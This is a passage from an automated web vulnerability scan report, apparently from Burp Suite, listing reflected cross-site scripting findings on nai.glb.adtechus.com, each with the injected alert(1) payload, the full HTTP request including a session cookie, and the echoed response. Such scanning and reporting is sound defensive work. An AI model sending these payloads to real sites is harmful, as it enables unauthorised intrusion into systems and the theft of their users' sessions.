"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules/book/book.css71189"-alert(1)-"209dcf79b99?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol.com"
...[SNIP]...
4.237. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5acb"><script>alert(1)</script>93caa8575c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesb5acb"><script>alert(1)</script>93caa8575c8/node/node.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modulesb5acb"><script>alert(1)</script>93caa8575c8/node/node.css?7" />
...[SNIP]...
4.238. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5557a"-alert(1)-"a8f801c4dc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules5557a"-alert(1)-"a8f801c4dc7/node/node.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules5557a"-alert(1)-"a8f801c4dc7/node/node.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.239. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 975cb"-alert(1)-"fdb8ecf7c8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/node975cb"-alert(1)-"fdb8ecf7c8f/node.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules/node975cb"-alert(1)-"fdb8ecf7c8f/node.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising
...[SNIP]...
4.240. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea4b"><script>alert(1)</script>ccf14c172ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/nodedea4b"><script>alert(1)</script>ccf14c172ef/node.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules/nodedea4b"><script>alert(1)</script>ccf14c172ef/node.css?7" />
...[SNIP]...
4.241. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dd5c"><script>alert(1)</script>3e245e85db5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules8dd5c"><script>alert(1)</script>3e245e85db5/system/defaults.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules8dd5c"><script>alert(1)</script>3e245e85db5/system/defaults.css?7" />
...[SNIP]...
4.242. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe51e"-alert(1)-"ba327efa48d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modulesfe51e"-alert(1)-"ba327efa48d/system/defaults.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modulesfe51e"-alert(1)-"ba327efa48d/system/defaults.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,
...[SNIP]...
4.243. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97cc9"-alert(1)-"41b082f2d2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system97cc9"-alert(1)-"41b082f2d2b/defaults.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules/system97cc9"-alert(1)-"41b082f2d2b/defaults.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...
4.244. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95224"><script>alert(1)</script>ded00d1dbef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system95224"><script>alert(1)</script>ded00d1dbef/defaults.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules/system95224"><script>alert(1)</script>ded00d1dbef/defaults.css?7" />
...[SNIP]...
4.245. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2796e"><script>alert(1)</script>c4c53086acb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules2796e"><script>alert(1)</script>c4c53086acb/system/system-menus.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules2796e"><script>alert(1)</script>c4c53086acb/system/system-menus.css?7" />
...[SNIP]...
4.246. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d399c"-alert(1)-"4adb513258f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modulesd399c"-alert(1)-"4adb513258f/system/system-menus.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modulesd399c"-alert(1)-"4adb513258f/system/system-menus.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascri
...[SNIP]...
4.247. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec01"><script>alert(1)</script>1a7fe964ec6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/systembec01"><script>alert(1)</script>1a7fe964ec6/system-menus.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules/systembec01"><script>alert(1)</script>1a7fe964ec6/system-menus.css?7" />
...[SNIP]...
4.248. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dafeb"-alert(1)-"493cbb0ab09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/systemdafeb"-alert(1)-"493cbb0ab09/system-menus.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
